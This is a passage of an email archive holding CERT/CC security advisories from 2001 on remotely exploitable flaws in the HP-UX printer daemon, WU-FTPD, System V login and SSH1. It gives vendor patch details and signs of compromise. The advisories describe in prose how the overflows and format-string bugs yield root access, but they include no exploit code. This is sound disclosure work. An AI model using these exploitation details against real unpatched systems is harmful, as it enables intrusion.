2001 14:41:53 -0500 (EST) Date: Wed, 21 Nov 2001 14:41:53 -0500 (EST) Received: by canaveral.red.cert.org; Wed, 21 Nov 2001 14:32:32 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-32 Buffer Overflow in HP-UX Line Printer Daemon X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: a119bd4c66aad9995abeb6c0df319fa0 Status: RO X-Status: X-Keywords: X-UID: 29 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-32 Buffer Overflow in HP-UX Line Printer Daemon Original release date: November 21, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected HP9000 Servers running the following releases: * HP-UX Version 10.01 * HP-UX Version 10.10 * HP-UX Version 10.20 * HP-UX Version 11.00 * HP-UX Version 11.11 Overview The HP-UX line printer daemon (rlpdaemon) enables various clients to share printers over a network. A remotely exploitable buffer overflow vulnerability exists in the rlpdaemon. I. Description By sending a specially crafted print request to an HP-UX host running the rlpdaemon, a local or remote attacker can trigger the buffer overflow. Intruders may find this vulnerability attractive to exploit because the line printer daemon is enabled by default to provide printing services. Additionally, no previous knowledge of or access to the vulnerable system is required for exploitation. Internet Security Systems (ISS) and Hewlett-Packard Company have issued the following announcements, respectively: Remote Logic Flaw Vulnerability in HP-UX Line Printer Daemon Hewlett-Packard Company Security Bulletin #0176 This vulnerability has been assigned the identifier CAN-2001-0817 by the Common Vulnerabilities and Exposures (CVE) group: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0817 For the latest and most detailed information about this vulnerability, please see VU#638011. II. Impact An attacker can execute arbitrary code on the target system with the privileges of the line printer daemon, typically superuser. III. Solution Install a patch from HP. More information is available in Appendix A. Restrict access to the lpd service As a general practice, we recommend disabling all services that are not explicitly required. You may wish to disable the line printer daemon until a patch can be applied. If you cannot disable the service, you can limit your exposure to these vulnerabilities by using a router or firewall to restrict access to port 515/TCP (printer). Note that this does not protect you against attackers from within your network. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Hewlett-Packard Company Please see Hewlett-Packard Company Security Bulletin #0176. Appendix B. - References 1. http://www.kb.cert.org/vuls/id/638011 2. http://xforce.iss.net/alerts/advise102.php 3. http://www.kb.cert.org/vuls/id/IAFY-54PKL4 _________________________________________________________________ _________________________________________________________________ This vulnerability was discovered and researched by Mark Dowd and Kris Hunt of Internet Security Systems (ISS). The CERT/CC thanks ISS for the information contained in their advisory. _________________________________________________________________ Author: Ian A. Finlay. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-32.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site: http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message: subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History November 21, 2001: initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBO/v/ZaCVPMXQI2HJAQET4gP/e7X3trRSEzNeXBlE8TkMX0phGOCDe2xQ ksuW+n6Idr+056a1ZqYbA9q8FG8qIRYCR51Hfl5OsX3NeztdjfMLylW+Xkf5sqn7 w0zmSzj2zXXEHyKz9Zzbfj544E86L2i+yJVjGrtrKyqYaWvJH5bXLWAzFFm3Qpme 698IC1jYn/k= =k4Qj -----END PGP SIGNATURE----- From - Fri Nov 30 09:09:28 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id fAU2bPZ20306; Thu, 29 Nov 2001 18:37:25 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id SAA29407; Thu, 29 Nov 2001 18:49:24 -0500 (EST) Date: Thu, 29 Nov 2001 18:49:24 -0500 (EST) Received: by canaveral.red.cert.org; Thu, 29 Nov 2001 18:44:06 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-33 Multiple Vulnerabilities in WU-FTPD X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 502ba7b9758d854be5c23ba7bcb76ca1 Status: RO X-Status: X-Keywords: X-UID: 30 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-33 Multiple Vulnerabilities in WU-FTPD Original release date: November 29, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Systems running WU-FTPD and its derivatives Overview WU-FTPD is a widely deployed software package used to provide File Transport Protocol (FTP) services on UNIX and Linux systems. There are two vulnerabilities in WU-FTPD that expose a system to potential remote root compromise by anyone with access to the FTP service. These vulnerabilities have recently received increased scrutiny. I. Description There are two remote code execution vulnerabilities in the Washington University FTP daemon (WU-FTPD). Both of these vulnerabilities have been discussed in public forums and have received widespread exposure. VU#886083: WU-FTPD does not properly handle glob command WU-FTPD features globbing capabilities that allow a user to specify multiple file names and locations using typical shell notation. See CERT Advisory CA-2001-07 for a more complete explanation of globbing. WU-FTPD implements its own globbing code instead of using libraries in the underlying operating system. When the globbing code is called, it allocates memory on the heap to store a list of file names that match the expanded glob expression. The globbing code is designed to recognize invalid syntax and return an error condition to the calling function. However, when it encounters a specific string, the globbing code fails to properly return the error condition. Therefore, the calling function proceeds as if the glob syntax were correct and later frees unallocated memory that can contain user-supplied data. If intruders can place addresses and shellcode in the right locations on the heap using FTP commands, they may be able to cause WU-FTPD to execute arbitrary code by later issuing a command that is mishandled by the globbing code. This vulnerability is potentially exploitable by any user who is able to log in to a vulnerable server, including users with anonymous access. If the exploit is successful, an attacker may be able to execute arbitrary code with the privileges of WU-FTPD, typically root. If the exploit is unsuccessful, the thread servicing the request will fail, but the WU-FTPD process will continue to run. This vulnerability has been assigned the identifier CAN-2001-0550 by the Common Vulnerabilities and Exposures (CVE) group: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0550 CORE Security Technologies has published a Vulnerability Report on this issue: http://www.corest.com/pressroom/advisories_desplegado.php? dxsection=10&idx=17 VU#639760: WU-FTPD configured to use RFC 931 authentication running in debug mode contains format string vulnerability WU-FTPD can perform RFC 931 authentication when accepting inbound connections from clients. RFC 931 defines the Authentication Server Protocol, and is obsoleted by RFC 1413 which defines the Identity Protocol. RFC 931 is commonly known as "auth" or "authd", and RFC 1413 is commonly known "ident" or "identd". Both are named after the daemon that commonly provides the service. When using RFC 931 authentication, WU-FTPD will request ident information before authorizing a connection request from a client. The auth or ident service running on the client returns user-specific information, allowing WU-FTPD to make authentication decisions based on data in the ident response. WU-FTPD can also be run in debugging mode, which provides detailed information about its operation. When WU-FTPD is configured to perform RFC 931 authentication and is run in debug mode, it logs connection information using syslog(3) function calls. The logging code does not include format string specifiers in some syslog(3) calls, nor does the code perform adequate input validation on the contents of the identd response received from a client. As a result, a crafted identd response containing user-supplied format string specifiers is interpreted by syslog(3), possibly overwriting arbitrary locations in memory. By carefully designing such a request, an attacker may execute arbitrary code with the privileges of WU-FTPD. This vulnerability is potentially exploitable by any user who is able to log in to a vulnerable server, including users with anonymous access. The intruder must also be able to control their response to the ident request. If successful, an attacker may be able to execute arbitrary code with the privileges of WU-FTPD, typically root. Note that this vulnerability does not manifest unless WU-FTPD is configured to use RFC 931 authentication and is run in debug mode. This vulnerability has been assigned the identifier CAN-2001-0187 by the Common Vulnerabilities and Exposures (CVE) group: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0187 II. Impact Both of these vulnerabilities can be exploited remotely by any user with access to the FTP service, including anonymous access. Both vulnerabilities allow an intruder to execute arbitrary code with the privileges of WU-FTPD, typically root. An exploit attempt that does not succeed in executing code may crash WU-FTPD or end the connection used by the intruder. For additional information about the impacts of each of these vulnerabilities, please consult the CERT Vulnerability Notes Database (http://www.kb.cert.org/vuls). III. Solution Apply patches from your vendor Appendix A contains information for this advisory provided by vendors. As they report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly. Restrict access to WU-FTPD As a general practice, the CERT/CC recommends disabling services and access that are not explicitly required. You may wish to disable WU-FTPD until you are able to apply a patch. If you cannot disable the service, you can limit your exposure to these vulnerabilities by blocking or restricting access to the control channel (by default, port 21/tcp) used by WU-FTPD. In the case of the format string vulnerability (VU#639760), an exploit would be transmitted from port 113/tcp on the attacking host to the WU-FTPD server that made the identd request. Note that blocking access from untrusted networks such as the Internet does not protect your systems against attacks from within your network. Disable anonymous FTP access Although disabling anonymous FTP access does not prevent attacks from occurring, it does prevent unauthenticated users from attempting to exploit the globbing vulnerability (VU#886083). Appendix A. Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Note that this advisory discusses two distinct vulnerabilities, and vendor statements may address one or both. Caldera Caldera has released Security Advisory CSSA-2001-041.0: http://www.caldera.com/support/security/advisories/CSSA-2001-04 1.0.txt Cray Cray, Inc. is not vulnerable since the ftp supplied with UNICOS and UNICOS/mk is not based on the Washington University version. Cray did check their ftp code and does not see this exploit. Debian Debian addressed VU#639760 with Debian Security Advisory DSA-016 in January 2001: http://www.debian.org/security/2001/dsa-016 Hewlett-Packard Company HP's HP-UX is immune to this issue. It was fixed in conjunction with the last "globbing" issue announced in CERT Advisory CA-2001-07, released April 10, 2001. The lab did a complete check/scan of the globbing software, and fixed this issue then as well. Customers should apply the patches listed in HP Security Bulletin #162 released July 19,2001: HPSBUX0107-162 Security Vulnerability in ftpd and ftp Hewlett-Packard Security Bulletins are available at the IT Resource Center web site (registration required): http://www.itresourcecenter.hp.com/ IBM Corporation IBM's AIX operating system does not use WU-FTPD, hence is not vulnerable to the exploit described by CORE ST. Immunix Immunix has released Security Advisory IMNX-2001-70-036-01: http://download.immunix.org/ImmunixOS/7.0/updates/IMNX-2001-70- 036-01 OpenBSD OpenBSD does not use WU-FTPD. RedHat Inc. RedHat has released Errata Advisory RHSA-2001-147: http://www.redhat.com/support/errata/RHSA-2001-147.html SGI SGI does not ship IRIX with wu-ftpd, so IRIX is not vulnerable to these issues. SuSE SuSE has released SuSE Security Announcement SuSE-SA:2001:043. WU-FTPD The WU-FTPD Development Group has provided source code patches that address both of these issues. * VU#886083: ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_current/ftpglob .patch * VU#639760: ftp://ftp.wu-ftpd.org/pub/wu-ftpd/patches/apply_to_current/missing _format_strings.patch _________________________________________________________________ The CERT Coordination Center thanks CORE Security Technologies and the WU-FTPD Development Group for their help _________________________________________________________________ Author: Art Manion _________________________________________________________________ References * http://www.kb.cert.org/vuls/id/886083 * http://www.kb.cert.org/vuls/id/639760 * http://www.kb.cert.org/vuls * http://www.ietf.org/rfc/rfc931.txt * http://www.ietf.org/rfc/rfc1413.txt * http://www.ietf.org/rfc/rfc959.txt * http://www.corest.com/pressroom/advisories_desplegado.php?idxsecti on=10&idx=172 ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-33.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History November 29, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPAbHnaCVPMXQI2HJAQHA3wQAxL4GR+SowiE0IMczh+V7ENB5n2fo/1Yc zmI69F4rkOqQQXflsUrVcpPgDkKH2UIrlxREShj/gDqG+gcpyKig2OiqvzlOyb3e qdDScjFer80EhGlzgTKOoQE0L0RNU5tTD86jfxr8oATY+wjcLYm4Sos+HrnW78CZ UeM2P0vy/Oo= =oAMd -----END PGP SIGNATURE----- From - Wed Dec 12 17:29:46 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id fBD1SvI11885; Wed, 12 Dec 2001 17:28:57 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id SAA24493; Wed, 12 Dec 2001 18:12:58 -0500 (EST) Date: Wed, 12 Dec 2001 18:12:58 -0500 (EST) Received: by canaveral.red.cert.org; Wed, 12 Dec 2001 18:07:37 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-34 Buffer Overflow in System V Derived Login X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 3aec0ba057b711eb2f87d4b17439446e Status: RO X-Status: X-Keywords: X-UID: 31 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-34 Buffer Overflow in System V Derived Login Original release date: December 12, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * IBM AIX versions 4.3 and 5.1 * Hewlett-Packard's HP-UX * SCO OpenServer 5.0.6 and earlier * SGI IRIX 3.x * Sun Solaris 8 and earlier Overview Several applications use login for authentication to the system. A remotely exploitable buffer overflow exists in login derived from System V. Attackers can exploit this vulnerability to gain root access to the server. I. Description Several implementations of login that are derived from System V allow a user to specify arguments such as environment variables to the process. An array of buffers is used to store these arguments. A flaw exists in the checking of the number of arguments accepted. This flaw permits the array of buffers to be overflowed. On most systems, login is not suid; therefore, it runs as the user who called it. If, however, login is called by an application that runs with greater privileges than those of the user, such as telnetd or rlogind, then the user can exploit this vulnerability to gain the privileges of that program. In the case of telnetd or rlogind, root access is gained. Since in.telnetd and in.rlogind are available over the network, a remote attacker without any previous access to the system could use this vulnerability to gain root access to the system. If a program that invokes login is suid (or sgid) USER_A, then this can be exploited to gain the privileges of USER_A. An exploit exists and may be circulating. II. Impact This vulnerability can be remotely exploited to gain privileges of the invoker of login. In the case of a program such as telnetd, rlogind, or other suid root programs, root access is gained. III. Solution Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please review the VU#569272 for your vendor's status or contact your vendor directly. Restrict access to login We recommend disabling TELNET, RLOGIN and other programs that use login for authentication. Do not use programs that use a vulnerable login for authentication. Note that some SSH applications can be configured to use login for authentication. If this configuration is selected, then you will still be vulnerable. If you cannot disable the service, you can limit your exposure to these vulnerabilities by using a router or firewall to restrict access to port 23/TCP (telnet) and port 513/TCP (rlogin). Note that this does not protect you against attackers from within your network. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Apple Computer, Inc. Mac OS X and Mac OS X Server are not vulnerable. Caldera We are not using a SystemV based /bin/login, we are using the BSD originated rlogin tools. All OpenLinux products are 'Not Vulnerable'. Compaq Computer Corporation Compaq's Tru64 Software is not impacted by this reported problem. Cray Inc. Cray Inc. has determined that its implementation of login is not vulnerable to the situation described in VU#569272. Hewlett-Packard HP-UX is NOT Exploitable, even though HP-UX does have the buffer overflow, and hence is listed as "effected" above. In any case, the buffer overflow has been fixed by HP. IBM IBM's AIX operating system, versions 4.3 and 5.1, are susceptible to this vulnerability. We have prepared an emergency fix ("efix"), "tsmlogin_efix.tar.Z", and it is available for downloading from: ftp://aix.software.ibm.com/aix/efixes/security The APAR assignment for AIX 5.1 is IY26221, and will be available soon. The APAR for AIX 4.3 is pending, as a new level of 4.3 is nearly available. The "README" file at the above FTP site will be updated to provide the official fix information and availability. NetBSD NetBSD does not use a System V derived login, and therefore, NetBSD is not vulnerable. Red Hat Red Hat Linux does not use a System V derived /bin/login, and is therefore not vulnerable to this. Sun Microsystems Sun has developed a fix and T-patches are being tested. Official patches will be released shortly and Sun will issue a Sun Security Bulletin when they are available. _________________________________________________________________ The CERT Coordination Center thanks Internet Security Systems and Sun Microsystems for the technical information they provided. _________________________________________________________________ Feedback on this document can be directed to the author, Jason A. Rafail _________________________________________________________________ References * http://www.kb.cert.org/vuls/id/569272 * http://www.kb.cert.org/vuls ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-34.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History December 12, 2001 : Initial Release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPBfg3qCVPMXQI2HJAQE8swP/SGmx37pJWLq9fWhwx/xzu/DSwf8AnjjP jYbOqE+Iy17YOlI38q1MMh3ifgWoQSW6EeCWlt+Wu6R19APdfbuIbEv+/1iDP+6/ VZK+nnjs4F/i7rWcW0vH8jojFrNkXpAfuZIMEkvzcS/EkrgCisIiB3x9t75CQT+6 V7+HUmMS7+0= =aq9W -----END PGP SIGNATURE----- From - Thu Dec 13 15:12:18 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id fBDLh4I10605; Thu, 13 Dec 2001 13:43:04 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA28577; Thu, 13 Dec 2001 14:33:31 -0500 (EST) Date: Thu, 13 Dec 2001 14:33:31 -0500 (EST) Received: by canaveral.red.cert.org; Thu, 13 Dec 2001 14:27:52 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-35 Recent Activity Against Secure Shell Daemons X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: ab7e122fa8e7b76a312a759dbaf81ce7 Status: RO X-Status: X-Keywords: X-UID: 32 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-35 Recent Activity Against Secure Shell Daemons Original release date: December 13, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Systems running implementations of the Secure Shell (SSH) protocol Overview There are multiple vulnerabilities in several implementations of the Secure Shell (SSH) protocol. The SSH protocol enables a secure communications channel from a client to a server. We are seeing a high amount of scanning for SSH daemons, and we are receiving reports of exploitation. System administrators should review their configurations to ensure that they have applied all relevant patches prior to the holiday break. I. Description There are multiple vulnerabilities in several implementations of the Secure Shell (SSH) protocol. While these problems have been previously disclosed, we believe many system and network administrators may have overlooked one or more of these vulnerabilities. We are issuing this document primarily to encourage system and network administrators to check their systems, prior to the holiday break, for exposure to each of these vulnerabilities. The CERT/CC is still seeing active scanning and exploitation of vulnerabilities related to SSH. We also believe that it is important for system administrators to realize that several implementations of SSH version 2 will use their implementation of SSH version 1 if it is present and requested by the client. Therefore, upgrading to SSH version 2 is not necessarily a sufficient means to patch vulnerabilities that are present in the SSH version 1 implementation. The following vulnerability note and incident note describe activity regarding the SSH CRC32 attack detection code integer overflow vulnerability. VU#945216 - SSH CRC32 attack detection code contains remote integer overflow There is a remote integer overflow vulnerability in several implementations of the SSH1 protocol. This vulnerability is located in a segment of code that was introduced to defend against exploitation of CRC32 weaknesses in the SSH1 protocol (see VU#13877). The attack detection function (detect_attack, located in deattack.c) makes use of a dynamically allocated hash table to store connection information that is then examined to detect and respond to CRC32 attacks. By sending a crafted SSH1 packet to an affected host, an attacker can cause the SSH daemon to create a hash table with a size of zero. When the detection function then attempts to hash values into the null-sized hash table, these values can be used to modify the return address of the function call, thus causing the program to execute arbitrary code with the privileges of the SSH daemon, typically root. IN-2001-12 - Exploitation of vulnerability in SSH1 CRC-32 compensation attack detector In reports received by the CERT/CC, systems compromised via this vulnerablity have exhibited the following pattern in system log messages: hostname sshd[xxx]: Disconnecting: Corrupted check bytes on input. hostname sshd[xxx]: Disconnecting: crc32 compensation attack: network attack detected hostname sshd[xxx]: Disconnecting: crc32 compensation attack: network attack detected .. Some exploits for this vulnerability appear to use a brute force method, so many messages of this type may be logged before a system is successfully compromised. The following artifacts have been discovered on systems that were successfully compromised: * Installation of rootkits that modify standard system utilities to hide the intruder's actions * Installation of Trojan horse versions of the SSH software, compiled from the latest OpenSSH source code plus intruder-supplied modifications * Installation of tools to scan large network blocks for other systems that are vulnerable to compromise. Log files left behind from these tools indicate that they operate by looking for the banner displayed upon connection to the sshd service. For a list of vulnerability notes related to SSH vulnerabilities, please see the References section. II. Impact The CRC32 attack detection code integer overflow vulnerability, as well as some of the vulnerabilities listed in the References section, can be exploited remotely. In some cases, they allow an intruder to execute arbitrary code with the privileges of the SSH application daemon, usually root. In some cases, an intruder must be an authorized user of the system. For specific information about the impacts of each of these vulnerabilities, please consult the CERT Vulnerability Notes Database (http://www.kb.cert.org/vuls). III. Solution Update to the latest version If possible, update your implementation of SSH to the latest release. If you are unable to update to the latest version, apply all relevant patches to your current version. It is also recommended that you look at the security or support section on each vendor's site. Note that it is important for system administrators to realize that several implementations of SSH version 2 will use their implementation of SSH version 1 if it is present and requested by the client. Therefore, upgrading to SSH version 2 is not necessarily a sufficient means to patch vulnerabilities that are present in the SSH version 1 implementation. Current versions for Data Fellows (F-Secure) can be found at http://www.f-secure.com/products/ssh/. Current versions for SSH Communications Security can be found at http://www.ssh.com/products/ssh/download.cfm. Current versions for OpenSSH can be found at http://www.openssh.com. Please visit your vendor's web site for the latest version. Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments for the advisory. Please review the CERT Vulnerability Notes Database (http://www.kb.cert.org/vuls) or contact your vendor directly. Restrict access to the SSH service As a general practice, we recommend disabling all services that are not explicitly required. You may wish to disable the SSH access if there is not a patch available from your vendor. If you cannot disable the service, you can limit your exposure to these vulnerabilities by using a router or firewall to restrict access to port 22/TCP (SSH). Use tcp wrappers or a program that provides similar functionality, or use the key-based IP restriction offered by your implementation. Note that this does not protect you against attackers from within your network. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments for the advisory. Please review the CERT Vulnerability Notes Database (http://www.kb.cert.org/vuls) or contact your vendor directly. Berkeley Software Design, Inc. (BSDI) The current 3.0.2p1 version of OpenSSH is available for BSD/OS version 4.2 in patch M420-018 and for BSD/OS 4.3 in patch M430-001. Patches are available via ftp from ftp://ftp.bsdi.com/bsdi/patches or via our web site at http://www.bsdi.com/support. Fujitsu Fujitsu's UXP/V operating system is not affected by the SSH security vulnerabilities because it does not support the SSH package. Hewlett-Packard Company This issue does not apply to HP-UX. HP does not ship SSH. IBM Corporation IBM's AIX operating system does not ship with OpenSSH; however, OpenSSH isavailable for installation on AIX via the Linux Affinity Toolkit. The version included on the CD containing the Toolkit is vulnerable to the latest discovered vulnerability discussed here, VU#157447, as was the version of OpenSSH available for downloading from the IBM Linux Affinity website. We have updated this version on the website to one that is not vulnerable to this security exposure. This version also fixes the other vulnerabilities described in this advisory. Customers can download this version by going to: http://www6.software.ibm.com/dl/aixtbx/aixtbx-p This site contains Linux Affinity applications containing cryptographic algorithms, and new users of this site are asked to register first. NetBSD The CRC32 attack vulnerability was patched in NetBSD-current on October 30, 2000. NetBSD 1.5 and later already include the patch. Users maintaining earlier revisions of NetBSD should update their systems using the security/openssh package from NetBSD pkgsrc if they have not already done so. Up to date NetBSD security information on SSH, and other vulnerabilities is available from http://www.netbsd.org/Security/ Sun Microsystems Sun does not ship the Secure Shell (SSH), thus Solaris is not affected by this issue. _________________________________________________________________ The CERT Coordination Center thanks Markus Friedl of OpenSSH for the technical assistance he provided. _________________________________________________________________ Feedback on this document can be directed to the authors, Jason A. Rafail and Chad Dougherty _________________________________________________________________ References ID Date Public Name VU#19124 01/20/98 SSH authentication agent follows symlinks via a UNIX domain socket VU#13877 06/11/98 Weak CRC allows packet injection into SSH sessions encrypted with block ciphers VU#40327 06/09/2000 OpenSSH UseLogin option allows remote execution of commands as root VU#363181 12/07/2000 OpenSSH disregards client configuration and allows server access to ssh-agent and/or X11 after session negotiation VU#850440 01/16/2001 SSH1 may generate weak passphrase when using Secure RPC VU#684820 01/18/2001 SSH-1 allows client authentication to be forwarded by a malicious server to another server VU#565052 01/18/2001 Passwords sent via SSH encrypted with RC4 can be easily cracked VU#786900 01/18/2001 SSH host key authentication can be bypassed when DNS is used to resolve localhost VU#25309 01/18/2001 Weak CRC allows RC4 encrypted SSH1 packets to be modified without notice VU#118892 01/18/2001 Older SSH clients do not allow users to disable X11 forwarding VU#665372 01/18/2001 SSH connections using RC4 and password authentication can be replayed VU#315308 01/18/2001 Weak CRC allows last block of IDEA-encrypted SSH packet to be changed without notice VU#945216 02/08/2001 SSH CRC32 attack detection code contains remote integer overflow VU#596827 03/19/2001 Weaknesses in the SSH protocol simplify brute-force attacks against passwords typed in an existing SSH session VU#655259 06/12/2001 OpenSSH allows arbitrary file deletion via symlink redirection of temporary file VU#737451 07/20/2001 SSH Secure Shell sshd2 does not adequately authenticate logins to accounts with encrypted password fields containing two or fewer characters VU#279763 11/19/2001 RhinoSoft Serv-U remote administration client transmits password in plaintext VU#157447 12/04/2001 OpenSSH UseLogin directive permits privilege escalation ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-35.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information 